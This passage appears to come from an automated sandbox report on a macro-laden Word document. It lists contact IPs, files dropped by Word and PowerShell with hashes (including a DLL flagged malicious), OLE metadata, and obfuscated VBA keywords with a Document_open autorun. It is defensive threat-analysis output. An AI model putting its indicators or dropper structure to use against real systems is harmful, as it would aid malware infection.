                                    • 46.45.148.196
                                    ECS9522020111219400053_19280.exeGet hashmaliciousBrowse
                                    • 46.235.9.150
                                    BdBdbczoqd.exeGet hashmaliciousBrowse
                                    • 185.84.181.88
                                    N89uC6re8k.exeGet hashmaliciousBrowse
                                    • 185.84.181.89
                                    SUmXCDNE9J.exeGet hashmaliciousBrowse
                                    • 185.84.181.88

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD43F3-025D-4403-9DBE-B492A11253DC}.tmp
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1024
                                    Entropy (8bit):0.05390218305374581
                                    Encrypted:false
                                    SSDEEP:3:ol3lYdn:4Wn
                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                    Malicious:false
                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):46
                                    Entropy (8bit):1.0424600748477153
                                    Encrypted:false
                                    SSDEEP:3:/lbWwWl:sZ
                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                    Malicious:false
                                    Preview: ........................................user.
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\bestand-8881014518 00944.LNK
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 6 15:53:37 2021, length=173568, window=hide
                                    Category:dropped
                                    Size (bytes):2168
                                    Entropy (8bit):4.54309093642631
                                    Encrypted:false
                                    SSDEEP:24:86/XTd6jFyG0lZ4eilZ5Dv3q8dM7dD26/XTd6jFyG0lZ4eilZ5Dv3q8dM7dV:86/XT0jFVI4vQ8Qh26/XT0jFVI4vQ8Q/
                                    MD5:95ABC75A1ECBD2FAE79C247DBAD5FC65
                                    SHA1:3963DE2F7328DCDF39BC6B89C501651D148B2FC5
                                    SHA-256:5B3D441BB63120846C0762E386C41B5C0054CEE56829CD8C45135ECC5B5D4218
                                    SHA-512:1E65F5B076E737D240EDC77B7488049DF8113FE071B0DEAF13673AB957CED764804A8B0CEEE18C65470BC983350DAEB3A8737E69E9FD70432171BC9C94F31CC3
                                    Malicious:false
                                    Preview: L..................F.... ......{.....{...Y>zL................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....&R.. .BESTAN~1.DOC..f.......Q.y.Q.y*...8.....................b.e.s.t.a.n.d.-.8.8.8.1.0.1.4.5.1.8. .0.0.9.4.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\bestand-8881014518 00944.doc.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.e.s.t.a.n.d.-.8.8.8.1.0.1.4.5.1.8. .0.0.9.4.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):110
                                    Entropy (8bit):4.442723495351642
                                    Encrypted:false
                                    SSDEEP:3:M1GhURBoPFofzihURBoPFomX1GhURBoPFov:MfcPFUFcPFtcPFy
                                    MD5:C0B69DCA42D8A513A96503BEBEAAC89D
                                    SHA1:6C7CAF13C3D8875D0B039031F1D1A0B7940C5A4D
                                    SHA-256:866AE52778733870E7DA8ECCDDAF8A261F836B8692050D2A7B6125D34B849CED
                                    SHA-512:BFE68194C1358B09FCF1D29CD7B3E94B891A900E0A94928D592E4F3271E3A36D917E50FB2BC581626A2D70CD01ED6557CBF1DCDC77F9F213366E5E9BFC06CC7D
                                    Malicious:false
                                    Preview: [doc]..bestand-8881014518 00944.LNK=0..bestand-8881014518 00944.LNK=0..[doc]..bestand-8881014518 00944.LNK=0..
                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KID2W9UHV84RRRS8AHDL.temp
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5885254735299674
                                    Encrypted:false
                                    SSDEEP:96:chQCsMq+qvsqvJCwomz8hQCsMq+qvsEHyqvJCworczvlYbHFf8OQlUVoIu:cyDomz8yXHnorczvef8O0Iu
                                    MD5:0A595C9B355BD03FD92A3F7F14507F20
                                    SHA1:A198741D16122F40564B52844F4F1B0F1E97FA1A
                                    SHA-256:A0875BA8870F27E85A4CFAE05C773ADB7B14B4F5B38FE076EBADBA07EB90B805
                                    SHA-512:C9DBABE0033FC2CBF3B95DA0F4F7BE0C472A15F6BCA0841F7A45E968F12D38E7E1265F142F7F8CF2E9B8D5FE56A197B09850DB74515D0D04F6C0401836CC5993
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):192000
                                    Entropy (8bit):7.470368045221206
                                    Encrypted:false
                                    SSDEEP:3072:SwbpDnn9F4rNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9F8aBYF0nVp2MJHybR8dS9
                                    MD5:009380116F3429BA6F236D199F418B98
                                    SHA1:292360D762524AD98FADDB735BB58AB3DABA5327
                                    SHA-256:323F6431FB274E90DC003E567C54CB5E2327E9408F903E49CC6F3E840BF9BCF6
                                    SHA-512:5D086691A8109091C847B690E905D0BDEACE03E0A295F120F0231B4A7ADC3EC45A77FF626DD9EA792BBD32EA02909CAC2EBF255D7155011244978927F4E1645C
                                    Malicious:true
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\Desktop\~$stand-8881014518 00944.doc
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce, Author: Julie Bernard, Template: Normal.dotm, Last Saved By: Carla Remy, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
                                    Entropy (8bit):6.6858064178991
                                    TrID:
                                    • Microsoft Word document (32009/1) 79.99%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                    File name:bestand-8881014518 00944.doc
                                    File size:172631
                                    MD5:8ce4185f17ed35f43462f2f44c1cfc3d
                                    SHA1:9c6396150dd23a65c36e84af69e15543cedca4d2
                                    SHA256:4425de724449dedb3b183a3bfd567f9d3449c2457a1e2fd695019b1b6227e035
                                    SHA512:cbf15287a8efcb602e445140d62875f313263581ff98f2950be2e60864de867d2b3420741beae9b653b5f2ad90fcbcb712c7a9a98de5802c943d44665835eb44
                                    SSDEEP:3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7grCeISWpqbd:59ufsfgIf0pLr7I/Od
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea2aaa4b4b4a4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "bestand-8881014518 00944.doc"

                                    Indicators

                                    Has Summary Info:True
                                    Application Name:Microsoft Office Word
                                    Encrypted Document:False
                                    Contains Word Document Stream:True
                                    Contains Workbook/Book Stream:False
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True

                                    Summary

                                    Code Page:1252
                                    Title:
                                    Subject:withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce
                                    Author:Julie Bernard
                                    Keywords:
                                    Comments:
                                    Template:Normal.dotm
                                    Last Saved By:Carla Remy
                                    Revion Number:1
                                    Total Edit Time:0
                                    Create Time:2021-01-05 06:14:00
                                    Last Saved Time:2021-01-05 06:14:00
                                    Number of Pages:1
                                    Number of Words:3222
                                    Number of Characters:18371
                                    Creating Application:Microsoft Office Word
                                    Security:8

                                    Document Summary

                                    Document Code Page:-535
                                    Number of Lines:153
                                    Number of Paragraphs:43
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:917504

                                    Streams with VBA

                                    VBA File Name: Oi5oelv0_s4, Stream Size: 17886
                                    General
                                    Stream Path:Macros/VBA/Oi5oelv0_s4
                                    VBA File Name:Oi5oelv0_s4
                                    Stream Size:17886
                                    Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . [ k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 ae c5 5b 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    DyjPBI
                                    dLrgANHCG
                                    EajdMLeD
                                    rgBSB
                                    Object
                                    yjNpyrf
                                    rJqMZII
                                    PGiog
                                    T_dehutl_mggmhizd
                                    EUMDPGt
                                    xkJxAAC
                                    AybxtEBCJ.Close
                                    JhiYfXc:
                                    VusSK
                                    "fUwLgjVtQyH"
                                    UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                                    bGnhXCA
                                    VJbwzTDT.Close
                                    VwnpBElhO
                                    MMAqSI
                                    UPhhYZEF
                                    "bVawaPADALVlWFFA"
                                    NFWzF
                                    "HiTyACJmCuGQFFJ"
                                    sGvJJWh
                                    PmBxcD:
                                    SfMKIOk
                                    "TthascRlxHZH"
                                    AybxtEBCJ:
                                    SFmrEDJ
                                    zOBhOx
                                    fUGQf
                                    numuq
                                    rEeiBJ
                                    ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                                    RkPWCDPC
                                    JADCpjk
                                    PmBxcD
                                    pDPzBJmM
                                    bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                                    WSARpB
                                    EUMDPGt.Close
                                    HnBvAEH
                                    "WXovaGHxqSlUt"
                                    QEIFFM
                                    bPFNuJ.WriteLine
                                    "PzrrnIFtpmxAx"
                                    EUMDPGt:
                                    ilONFzHG
                                    "akTuJaIGmZrUyF"
                                    qpOWEIHHA
                                    yJouG
                                    XwZxsHCGt
                                    FTalMbF
                                    XDJPUW
                                    "ALpzEMcwuWl"
                                    gQxBD:
                                    UUoAB
                                    tcYiEMeRH.Close
                                    nIHrI
                                    eUdbDAHHs.WriteLine
                                    "uJnfBHIPFKBxHBmEE"
                                    FPWaF
                                    JADCpjk.WriteLine
                                    xxYeFGUAH
                                    rfDgD
                                    njKwJdA.WriteLine
                                    "bOOXnOJYtbRAbm"
                                    VJbwzTDT:
                                    RkPWCDPC:
                                    UPhhYZEF.Close
                                    eWkHqVao
                                    Resume
                                    XKPUEfhk
                                    RLurCDDF
                                    gglHam
                                    "budRDJKVnJRU"
                                    DRrKpoA
                                    "]an"
                                    lgZgGO
                                    "gcZaHCGUVJsFmL"
                                    "yKdJWHAniqHFCB"
                                    ThHBBDu
                                    tcYiEMeRH.WriteLine
                                    waSbS
                                    VfJHAA
                                    vutdEkdRL
                                    NSiRQzd
                                    "frvvJFHIkftmZHE"
                                    OtQPAJH
                                    AybxtEBCJ.WriteLine
                                    XTdPHz
                                    OBwIBy:
                                    JADCpjk.Close
                                    QZjuH
                                    "DkRmTYGAMxqHI"
                                    zOQlGPVC
                                    "dWnMFoTBPDqeJK"
                                    jPnRGLC
                                    CbMZSLFAM
                                    kboRA
                                    ORIzFDySE
                                    DRrKpoA.Close
                                    VAEDpBCV
                                    uJSEDH:
                                    QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                                    "bAurYaGPwGKRiG"
                                    bPFNuJ
                                    "koDuGqAOJBlLgZIEme"
                                    DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                                    hiZkEEF.WriteLine
                                    txKQv
                                    xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                                    vtDUw
                                    RkPWCDPC.WriteLine
                                    aLGptGA
                                    "kWzGMzIVefGB"
                                    "ncDMUIadusSIDx"
                                    VB_Name
                                    RkPWCDPC.Close
                                    "JCgblEAJizSfW"
                                    uJSEDH
                                    eUdbDAHHs.Close
                                    "HfXAPQQbXKJHFGu"
                                    eBddHTXP
                                    AybxtEBCJ
                                    OBwIBy
                                    RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                                    VJbwzTDT.WriteLine
                                    ItSfCDCB
                                    Mid(Application.Name,
                                    JhiYfXc.Close
                                    PAxhJ
                                    "TJahKRWdrvHFIy"
                                    xOnWA
                                    xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                                    "lRcGHADAHrlHJJA"
                                    oOysMtDG
                                    syDRd
                                    dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                                    cTfCJ
                                    hiZkEEF
                                    "GhifcDKlpA"
                                    oOysMtDG.WriteLine
                                    FgmzCEm
                                    bPFNuJ:
                                    "HwixyOCYxmojd"
                                    UMzHfyAfA
                                    oOysMtDG:
                                    "eSpcpGDZncccrFb"
                                    oMcHDXEF
                                    reTrs
                                    "BWSOKPyHMnSQxi"
                                    EJEApM
                                    JADCpjk:
                                    XjhOHEMDC
                                    gQxBD
                                    "xtsHGQjpNzDIYJ"
                                    pSFXACJ
                                    wUoJIFDD
                                    HOkLRDGd
                                    njKwJdA.Close
                                    RvFOAEPH
                                    HMyHCQCGu
                                    njKwJdA
                                    "GqMIEnOQFEEDsE"
                                    bGMXEIA
                                    eUdbDAHHs:
                                    rtGyqOth
                                    wuKBFvqI
                                    hSbDPCC
                                    hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                                    rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                                    cSHkDL
                                    blQEM
                                    nKtfECko
                                    RUMGE
                                    Zpeehqbjjey.Create
                                    uJSEDH.WriteLine
                                    xNJyUCNg
                                    "BQumCJmmiAGIKv"
                                    yyoqEHETu
                                    GNnZJzE
                                    HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                                    yUWxTlVAC
                                    TxAVq
                                    EVOuqJnGD
                                    "cnLcFxEphoEbAFA"
                                    CksLJVJ
                                    PmBxcD.Close
                                    njKwJdA:
                                    XsKjcKE
                                    "GDTGdEJpuRnDBFQ"
                                    "ZRotGHIxyrpSqvsXCC"
                                    SOunIGkF
                                    "]anw["
                                    JhiYfXc
                                    ChWZVJiB
                                    lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                                    "OnehVAaWbfCAcAjsG"
                                    iytziJ
                                    "ohaTGaUTSwwDv"
                                    "qMnfwCwbPJC"
                                    "vRrzDEngIQvFPJfE"
                                    zgBjJOGEH
                                    tcYiEMeRH:
                                    OBwIBy.Close
                                    NtpdEJDH
                                    gQxBD.WriteLine
                                    "WMwcBSqFohy"
                                    EUMDPGt.WriteLine
                                    gQxBD.Close
                                    PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                                    QrVtQr
                                    VJbwzTDT
                                    UPhhYZEF.WriteLine
                                    uJSEDH.Close
                                    Zpeehqbjjey
                                    RNgUODjsM
                                    NBjEFGnEA
                                    oOysMtDG.Close
                                    YzIkA
                                    tcYiEMeRH
                                    xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                                    "TOSxJaIzCudpDlB"
                                    fUDmDCt
                                    "utFMeJhUKJhJ"
                                    aTfPCap
                                    "SjDfYFUFPynYGu"
                                    wCjuwBBGN
                                    JHrNWdBsW
                                    bPFNuJ.Close
                                    XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                                    "rVpvDaGGxNfeNUF"
                                    hiZkEEF.Close
                                    Nothing
                                    UPhhYZEF:
                                    IYKcgC
                                    dTtuVsDVA
                                    VcIiQJFi
                                    JhiYfXc.WriteLine
                                    "jVSXGfhYCxoHFD"
                                    lEOlGYxK
                                    "ozrZBTZBTMMIBB"
                                    hiZkEEF:
                                    "goMgGBdJMUDLAG"
                                    WtNcAKUFt
                                    "MvkIFCHFTnRqD"
                                    PmBxcD.WriteLine
                                    rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                                    SynsDAgHG
                                    "PFQdBLHsDnfTZv"
                                    vitXEH
                                    "OTLmJCwhyQMFzlB"
                                    oUWfJGBeE
                                    "OcgtIFEeoIFhxt"
                                    Error
                                    "lHuxHADjraNFBgI"
                                    CCnbXRBeA
                                    AiICOj
                                    VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                                    CmcBTTABc
                                    Attribute
                                    CHKzNBD
                                    TFXNGIiH
                                    "cGDcNrWsPeGCDF"
                                    LVadAF
                                    mmkTuwH
                                    eUdbDAHHs
                                    Function
                                    VbMBBgf
                                    MfgnKGWI
                                    ukrnIFCE
                                    EbuwEJS
                                    WxujBIAMz
                                    DRrKpoA:
                                    "dvqIBFEqwfkI"
                                    kskMAAHA
                                    OBwIBy.WriteLine
                                    xCaTC
                                    zLkRiC
                                    DRrKpoA.WriteLine
                                    "dxIGdcCHBKYgde"
                                    VBA Code
                                    VBA File Name: Qafkrimwsho, Stream Size: 697
                                    General
                                    Stream Path:Macros/VBA/Qafkrimwsho
                                    VBA File Name:Qafkrimwsho
                                    Stream Size:697
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 ae c5 45 f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    Attribute
                                    VB_Name
                                    "Qafkrimwsho"
                                    VBA Code
                                    VBA File Name: Wm_t404p8v_, Stream Size: 1106
                                    General
                                    Stream Path:Macros/VBA/Wm_t404p8v_
                                    VBA File Name:Wm_t404p8v_
                                    Stream Size:1106
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ae c5 f3 f6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    False
                                    Private
                                    VB_Exposed
                                    Attribute
                                    VB_Creatable
                                    VB_Name
                                    Document_open()
                                    VB_PredeclaredId
                                    VB_GlobalNameSpace
                                    VB_Base
                                    VB_Customizable
                                    VB_TemplateDerived
                                    VBA Code

                                    Streams

                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                    General
                                    Stream Path:\x1CompObj
                                    File Type:data
                                    Stream Size:146
                                    Entropy:4.00187355764
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.279952994103
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:544
                                    Entropy:4.15718276186
                                    Base64 Encoded:False
